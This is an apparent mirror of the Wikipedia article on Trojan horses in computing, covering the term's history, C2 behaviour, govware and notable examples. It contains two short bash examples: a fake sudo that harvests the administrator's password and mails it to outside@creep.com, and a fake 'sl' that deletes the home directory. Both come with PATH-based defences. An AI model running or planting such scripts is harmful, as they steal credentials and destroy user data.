fbpx
Wikipedia

Trojan horse (computing)

March 06, 2024

In computing, a Trojan horse is any malware that misleads users of its true intent by disguising itself as a standard program. The term is derived from the ancient Greek story of the deceptive Trojan Horse that led to the fall of the city of Troy.[1]

Trojans are generally spread by some form of social engineering. For example, where a user is duped into executing an email attachment disguised to appear innocuous (e.g., a routine form to be filled in), or by clicking on a fake advertisement on social media or anywhere else. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller who can then have unauthorized access to the affected computer.[2] Ransomware attacks are often carried out using a Trojan.

Unlike computer viruses and worms, Trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves.[3]

Use of the term edit

It is not clear where or when the concept, and this term for it, was first used, but by 1971 the first Unix manual assumed its readers knew both:[4]

Another early reference is in a US Air Force report in 1974 on the analysis of vulnerability in the Multics computer systems.[5]

It was made popular by Ken Thompson in his 1983 Turing Award acceptance lecture "Reflections on Trusting Trust",[6] subtitled: "To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software." He mentioned that he knew about the possible existence of Trojans from a report on the security of Multics.[7][8]

Behavior edit

Once installed, Trojans may perform a range of malicious actions. Many tend to contact one or more Command and Control (C2) servers across the Internet and await instruction. Since individual Trojans typically use a specific set of ports for this communication, it can be relatively simple to detect them. Moreover, other malware could potentially "take over" the Trojan, using it as a proxy for malicious action.[9]

In German-speaking countries, spyware used or made by the government is sometimes called govware. Govware is typically a Trojan software used to intercept communications from the target computer. Some countries like Switzerland and Germany have a legal framework governing the use of such software.[10][11] Examples of govware Trojans include the Swiss MiniPanzer and MegaPanzer[12] and the German "state Trojan" nicknamed R2D2.[10] German govware works by exploiting security gaps unknown to the general public and accessing smartphone data before it becomes encrypted via other applications.[13]

Due to the popularity of botnets among hackers and the availability of advertising services that permit authors to violate their users' privacy, Trojans are becoming more common. According to a survey conducted by BitDefender from January to June 2009, "Trojan-type malware is on the rise, accounting for 83% of the global malware detected in the world." Trojans have a relationship with worms, as they spread with the help given by worms and travel across the internet with them.[14] BitDefender has stated that approximately 15% of computers are members of a botnet, usually recruited by a Trojan infection.[15]

Recent investigations have revealed that the Trojan horse method has been used as an attack on cloud computing systems. A Trojan attack on cloud systems tries to insert an application or service into the system that can impact the cloud services by changing or stopping the functionalities. When the cloud system identifies the attacks as legitimate, the service or application is performed which can damage and infect the cloud system.[16]

Linux sudo example edit

A Trojan horse is a program that purports to perform some legitimate function, yet upon execution it compromises the user's security.[17] A simple example is the following malicious version of the Linux sudo command. An attacker would place this script in a publicly writable directory (e.g., /tmp). If an administrator happens to be in this directory and executes sudo, then the Trojan may execute, compromising the administrator's password. 

#!/usr/bin/env bash # Turn off the character echo to the screen. sudo does this to prevent the user's password from appearing on screen when they type it in. stty -echo # Prompt user for password and then read input. To disguise the nature of this malicious version, do this 3 times to imitate the behavior of sudo when a user enters the wrong password. prompt_count=1 while [ $prompt_count -le 3 ]; do  echo -n "[sudo] password for $(whoami): "  read password_input  echo  sleep 3 # sudo will pause between repeated prompts  prompt_count=$(( prompt_count + 1 )) done # Turn the character echo back on. stty echo echo $password_input | mail -s "$(whoami)'s password" outside@creep.com # Display sudo's actual error message and then delete self. echo "sudo: 3 incorrect password attempts" rm $0 exit 1 # sudo returns 1 with a failed password attempt

To prevent a sudo Trojan horse, set the . entry in the PATH environment variable to be located at the tail end.[18] For example: PATH=/usr/local/bin:/usr/bin:..

Linux ls example edit

Having . somewhere in the PATH is convenient, but there is a catch.[19] Another example is the following malicious version of the Linux ls command. However, the filename is not ls; instead, it is sl. An attacker would place this script in a publicly writable directory (e.g., /tmp). 

#!/usr/bin/env bash # Remove the user's home directory, then remove self. rm -fr ~ 2>/dev/null rm $0

To prevent a malicious programmer from anticipating this common typing mistake:

  1. omit . in the PATH or
  2. alias sl=ls [a]

Notable examples edit

Private and governmental edit

Publicly available edit

Detected by security researchers edit

Capitalization edit

The computer term "Trojan horse" is derived from the legendary Trojan Horse of the ancient city of Troy. For this reason "Trojan" is often capitalized. However, while style guides and dictionaries differ, many suggest a lower case "trojan" for normal use.[30][31]

See also edit

References edit

  1. ^ "Trojan Horse Definition". Retrieved April 5, 2012. Greek soldiers, unable to penetrate the defenses of the city of Troy during a years-long war, presented the city with a peace offering of a large wooden horse.
  2. ^ "Difference between viruses, worms, and trojans". Symantec Security Center. Broadcom Inc. Archived from the original on August 19, 2013. Retrieved March 29, 2020.
  3. ^ . October 9, 1995. Archived from the original on August 5, 2020. Retrieved September 16, 2019.
  4. ^ Thompson, Ken; Ritchie, Dennis M. "Unix Programmer's Manual, November 3, 1971" (PDF). p. 5. Retrieved March 28, 2020. Also, one may not change the owner of a file with the set—user—ID bit on, otherwise one could create Trojan Horses able to misuse other's files.
  5. ^ Karger, P.A.; Schell, R.R., (PDF), HQ Electronic Systems Division: Hanscom AFB, MA, II, archived from the original (PDF) on July 9, 2011, retrieved December 24, 2017
  6. ^ Ken Thompson (1984). "Reflection on Trusting Trust". Commun. ACM. 27 (8): 761–763. doi:10.1145/358198.358210..
  7. ^ Paul A. Karger; Roger R. Schell (2002), "Thirty Years Later: Lessons from the Multics Security Evaluation" (PDF), ACSAC: 119–126
  8. ^ Karger et Schell wrote that Thompson added this reference in a later version of his Turing conference: Ken Thompson (November 1989), "On Trusting Trust.", Unix Review, 7 (11): 70–74
  9. ^ Crapanzano, Jamie (2003). Deconstructing SubSeven, the Trojan Horse of Choice (Report). SANS Institute. Retrieved May 10, 2021.
  10. ^ a b Basil Cupa, Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware), LISS 2013, pp. 419–428
  11. ^ . Federal Department of Justice and Police. Archived from the original on May 6, 2013.
  12. ^ Dunn, John (August 27, 2009). "Swiss coder publicises government spy Trojan". TechWorld. Archived from the original on January 26, 2014. Retrieved January 10, 2021.
  13. ^ "German federal police use trojan virus to evade phone encryption". DW. Retrieved April 14, 2018.
  14. ^ . BitDefender. Archived from the original on August 8, 2009. Retrieved March 27, 2020.
  15. ^ Datta, Ganesh (August 7, 2014). "What are Trojans?". SecurAid. Archived from the original on August 12, 2014. Retrieved March 27, 2020.
  16. ^ Kanaker, Hasan; Karim, Nader Abdel; Awwad, Samer A. B.; Ismail, Nurul H. A.; Zraqou, Jamal; Ali, Abdulla M. F. Al (December 20, 2022). "Trojan Horse Infection Detection in Cloud Based Environment Using Machine Learning". International Journal of Interactive Mobile Technologies (IJIM). 16 (24): 81–106. doi:10.3991/ijim.v16i24.35763. ISSN 1865-7923.
  17. ^ Wood, Patrick H.; Kochan, Stephen G. (1985). UNIX System Security. Hayden Books. p. 42. ISBN 0-8104-6267-2.
  18. ^ Wood, Patrick H.; Kochan, Stephen G. (1985). UNIX System Security. Hayden Books. p. 43. ISBN 0-8104-6267-2. The above Trojan horse works only if a user's PATH is set to search the current directory for commands before searching the system's directories.
  19. ^ "What's wrong with having '.' in your $PATH?". Penn Engineering. Retrieved November 28, 2023. [I]f you're a clumsy typist and some day type "sl -l" instead of "ls -l", you run the risk of running "./sl", if there is one. Some "clever" programmer could anticipate common typing mistakes and leave programs by those names scattered throughout public directories. Beware.
  20. ^ Seth, Kulakow (1998). "Is it still a Trojan horse or an Actual Valid Remote Control Administration Tool?" (Report). SANS Institute. Retrieved May 10, 2021.
  21. ^ "Mega-Panzer". SourceForge. September 21, 2016.
  22. ^ "Mini-Panzer". SourceForge. September 18, 2016.
  23. ^ "What is Sova virus?". India Today.
  24. ^ "Trojanized adware family abuses accessibility service to install whatever apps it wants – Lookout Blog".
  25. ^ Neal, Dave (November 20, 2015). . The Inquirer. Incisive Business Media. Archived from the original on November 22, 2015. Retrieved March 27, 2020.{{cite web}}: CS1 maint: unfit URL (link)
  26. ^ "Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire – Lookout Blog".
  27. ^ "Shuanet, ShiftyBug and Shedun malware could auto-root your Android". November 5, 2015.
  28. ^ Times, Tech (November 9, 2015). "New Family of Android Malware Virtually Impossible To Remove: Say Hello To Shedun, Shuanet And ShiftyBug".
  29. ^ "Android adware can install itself even when users explicitly reject it". November 19, 2015.
  30. ^ "trojan". Collins Advanced Dictionary. Retrieved March 29, 2020.
  31. ^ "trojan horse". Microsoft Style Guide. Microsoft. Retrieved March 29, 2020.

Notes edit

  1. ^ Place the alias statement in /etc/profile

External links edit

  •   Media related to Trojan horse (malware) at Wikimedia Commons
  • "CERT Advisory CA-1999-02 Trojan Horses" (PDF). Carnegie Mellon University Software Engineering Institute. from the original on October 17, 2000. Retrieved September 15, 2019.

March 06, 2024
trojan, horse, computing, computing, trojan, horse, malware, that, misleads, users, true, intent, disguising, itself, standard, program, term, derived, from, ancient, greek, story, deceptive, trojan, horse, that, fall, city, troy, trojans, generally, spread, s. In computing a Trojan horse is any malware that misleads users of its true intent by disguising itself as a standard program The term is derived from the ancient Greek story of the deceptive Trojan Horse that led to the fall of the city of Troy 1 Trojans are generally spread by some form of social engineering For example where a user is duped into executing an email attachment disguised to appear innocuous e g a routine form to be filled in or by clicking on a fake advertisement on social media or anywhere else Although their payload can be anything many modern forms act as a backdoor contacting a controller who can then have unauthorized access to the affected computer 2 Ransomware attacks are often carried out using a Trojan Unlike computer viruses and worms Trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves 3 Contents 1 Use of the term 2 Behavior 3 Linux sudo example 4 Linux ls example 5 Notable examples 5 1 Private and governmental 5 2 Publicly available 5 3 Detected by security researchers 6 Capitalization 7 See also 8 References 9 Notes 10 External linksUse of the term editIt is not clear where or when the concept and this term for it was first used but by 1971 the first Unix manual assumed its readers knew both 4 Another early reference is in a US Air Force report in 1974 on the analysis of vulnerability in the Multics computer systems 5 It was made popular by Ken Thompson in his 1983 Turing Award acceptance lecture Reflections on Trusting Trust 6 subtitled To what extent should one trust a statement that a program is free of Trojan horses Perhaps it is more important to trust the people who wrote the software He mentioned that he knew about the possible existence of Trojans from a report on the security of Multics 7 8 Behavior editOnce installed Trojans may perform a range of malicious actions Many tend to contact one or more Command and Control C2 servers across the Internet and await instruction Since individual Trojans typically use a specific set of ports for this communication it can be relatively simple to detect them Moreover other malware could potentially take over the Trojan using it as a proxy for malicious action 9 In German speaking countries spyware used or made by the government is sometimes called govware Govware is typically a Trojan software used to intercept communications from the target computer Some countries like Switzerland and Germany have a legal framework governing the use of such software 10 11 Examples of govware Trojans include the Swiss MiniPanzer and MegaPanzer 12 and the German state Trojan nicknamed R2D2 10 German govware works by exploiting security gaps unknown to the general public and accessing smartphone data before it becomes encrypted via other applications 13 Due to the popularity of botnets among hackers and the availability of advertising services that permit authors to violate their users privacy Trojans are becoming more common According to a survey conducted by BitDefender from January to June 2009 Trojan type malware is on the rise accounting for 83 of the global malware detected in the world Trojans have a relationship with worms as they spread with the help given by worms and travel across the internet with them 14 BitDefender has stated that approximately 15 of computers are members of a botnet usually recruited by a Trojan infection 15 Recent investigations have revealed that the Trojan horse method has been used as an attack on cloud computing systems A Trojan attack on cloud systems tries to insert an application or service into the system that can impact the cloud services by changing or stopping the functionalities When the cloud system identifies the attacks as legitimate the service or application is performed which can damage and infect the cloud system 16 Linux sudo example editA Trojan horse is a program that purports to perform some legitimate function yet upon execution it compromises the user s security 17 A simple example is the following malicious version of the Linux sudo command An attacker would place this script in a publicly writable directory e g tmp If an administrator happens to be in this directory and executes sudo then the Trojan may execute compromising the administrator s password usr bin env bash Turn off the character echo to the screen sudo does this to prevent the user s password from appearing on screen when they type it in stty echo Prompt user for password and then read input To disguise the nature of this malicious version do this 3 times to imitate the behavior of sudo when a user enters the wrong password prompt count 1 while prompt count le 3 do echo n sudo password for whoami read password input echo sleep 3 sudo will pause between repeated prompts prompt count prompt count 1 done Turn the character echo back on stty echo echo password input mail s whoami s password outside creep com Display sudo s actual error message and then delete self echo sudo 3 incorrect password attempts rm 0 exit 1 sudo returns 1 with a failed password attempt To prevent a sudo Trojan horse set the entry in the a href PATH variable html title PATH variable PATH a environment variable to be located at the tail end 18 For example PATH usr local bin usr bin Linux ls example editHaving somewhere in the PATH is convenient but there is a catch 19 Another example is the following malicious version of the Linux ls command However the filename is not ls instead it is sl An attacker would place this script in a publicly writable directory e g tmp usr bin env bash Remove the user s home directory then remove self rm fr 2 gt dev null rm 0 To prevent a malicious programmer from anticipating this common typing mistake omit in the PATH or alias sl ls a Notable examples editPrivate and governmental edit ANOM FBI 0zapftis r2d2 StaatsTrojaner DigiTask DarkComet CIA NSA FinFisher Lench IT solutions Gamma International DaVinci Galileo RCS HackingTeam Magic Lantern FBI SUNBURST SVR Cozy Bear suspected TAO QUANTUM FOXACID NSA WARRIOR PRIDE GCHQPublicly available edit EGABTR late 1980s Netbus 1998 published 20 Sub7 by Mobman 1999 published Back Orifice 1998 published Y3K by Tselentis brothers 2000 published Beast 2002 published Bifrost Trojan 2004 published DarkComet 2008 2012 published Blackhole exploit kit 2012 published Gh0st RAT 2009 published MegaPanzer BundesTrojaner 2009 published 21 22 MEMZ by Leurak 2016 published Detected by security researchers edit Twelve Tricks 1990 Clickbot A 2006 discovered Zeus 2007 discovered Flashback Trojan 2011 discovered ZeroAccess 2011 discovered Koobface 2008 discovered Vundo 2009 discovered Coreflood 2010 discovered Tiny Banker Trojan 2012 discovered SOVA 2022 discovered 23 Shedun Android malware 2015 discovered 24 25 26 27 28 29 Capitalization editThe computer term Trojan horse is derived from the legendary Trojan Horse of the ancient city of Troy For this reason Trojan is often capitalized However while style guides and dictionaries differ many suggest a lower case trojan for normal use 30 31 See also editComputer security Cuckoo s egg metaphor Cyber spying Dancing pigs Exploit computer security Industrial espionage Phishing Principle of least privilege Privacy invasive software Remote administration Remote administration software Reverse connection Rogue security software Scammers Technical support scam Timeline of computer viruses and worms Zombie computer science References edit Trojan Horse Definition Retrieved April 5 2012 Greek soldiers unable to penetrate the defenses of the city of Troy during a years long war presented the city with a peace offering of a large wooden horse Difference between viruses worms and trojans Symantec Security Center Broadcom Inc Archived from the original on August 19 2013 Retrieved March 29 2020 VIRUS L comp virus Frequently Asked Questions FAQ v2 00 Question B3 What is a Trojan Horse October 9 1995 Archived from the original on August 5 2020 Retrieved September 16 2019 Thompson Ken Ritchie Dennis M Unix Programmer s Manual November 3 1971 PDF p 5 Retrieved March 28 2020 Also one may not change the owner of a file with the set user ID bit on otherwise one could create Trojan Horses able to misuse other s files Karger P A Schell R R Multics Security Evaluation Vulnerability Analysis ESD TR 74 193 PDF HQ Electronic Systems Division Hanscom AFB MA II archived from the original PDF on July 9 2011 retrieved December 24 2017 Ken Thompson 1984 Reflection on Trusting Trust Commun ACM 27 8 761 763 doi 10 1145 358198 358210 Paul A Karger Roger R Schell 2002 Thirty Years Later Lessons from the Multics Security Evaluation PDF ACSAC 119 126 Karger et Schell wrote that Thompson added this reference in a later version of his Turing conference Ken Thompson November 1989 On Trusting Trust Unix Review 7 11 70 74 Crapanzano Jamie 2003 Deconstructing SubSeven the Trojan Horse of Choice Report SANS Institute Retrieved May 10 2021 a b Basil Cupa Trojan Horse Resurrected On the Legality of the Use of Government Spyware Govware LISS 2013 pp 419 428 Haufig gestellte Fragen Frequently Asked Questions Federal Department of Justice and Police Archived from the original on May 6 2013 Dunn John August 27 2009 Swiss coder publicises government spy Trojan TechWorld Archived from the original on January 26 2014 Retrieved January 10 2021 German federal police use trojan virus to evade phone encryption DW Retrieved April 14 2018 BitDefender Malware and Spam Survey finds E Threats Adapting to Online Behavioral Trends BitDefender Archived from the original on August 8 2009 Retrieved March 27 2020 Datta Ganesh August 7 2014 What are Trojans SecurAid Archived from the original on August 12 2014 Retrieved March 27 2020 Kanaker Hasan Karim Nader Abdel Awwad Samer A B Ismail Nurul H A Zraqou Jamal Ali Abdulla M F Al December 20 2022 Trojan Horse Infection Detection in Cloud Based Environment Using Machine Learning International Journal of Interactive Mobile Technologies IJIM 16 24 81 106 doi 10 3991 ijim v16i24 35763 ISSN 1865 7923 Wood Patrick H Kochan Stephen G 1985 UNIX System Security Hayden Books p 42 ISBN 0 8104 6267 2 Wood Patrick H Kochan Stephen G 1985 UNIX System Security Hayden Books p 43 ISBN 0 8104 6267 2 The above Trojan horse works only if a user s PATH is set to search the current directory for commands before searching the system s directories What s wrong with having in your PATH Penn Engineering Retrieved November 28 2023 I f you re a clumsy typist and some day type sl l instead of ls l you run the risk of running sl if there is one Some clever programmer could anticipate common typing mistakes and leave programs by those names scattered throughout public directories Beware Seth Kulakow 1998 Is it still a Trojan horse or an Actual Valid Remote Control Administration Tool Report SANS Institute Retrieved May 10 2021 Mega Panzer SourceForge September 21 2016 Mini Panzer SourceForge September 18 2016 What is Sova virus India Today Trojanized adware family abuses accessibility service to install whatever apps it wants Lookout Blog Neal Dave November 20 2015 Shedun trojan adware is hitting the Android Accessibility Service The Inquirer Incisive Business Media Archived from the original on November 22 2015 Retrieved March 27 2020 a href Template Cite web html title Template Cite web cite web a CS1 maint unfit URL link Lookout discovers new trojanized adware 20K popular apps caught in the crossfire Lookout Blog Shuanet ShiftyBug and Shedun malware could auto root your Android November 5 2015 Times Tech November 9 2015 New Family of Android Malware Virtually Impossible To Remove Say Hello To Shedun Shuanet And ShiftyBug Android adware can install itself even when users explicitly reject it November 19 2015 trojan Collins Advanced Dictionary Retrieved March 29 2020 trojan horse Microsoft Style Guide Microsoft Retrieved March 29 2020 Notes edit Place the alias statement in etc profileExternal links edit nbsp Media related to Trojan horse malware at Wikimedia Commons CERT Advisory CA 1999 02 Trojan Horses PDF Carnegie Mellon University Software Engineering Institute Archived from the original on October 17 2000 Retrieved September 15 2019 Retrieved from https en wikipedia org w index php title Trojan horse computing amp oldid 1211561146, wikipedia, wiki, book, books, library,

article

, read, download, free, free download, mp3, video, mp4, 3gp, jpg, jpeg, gif, png, picture, music, song, movie, book, game, games.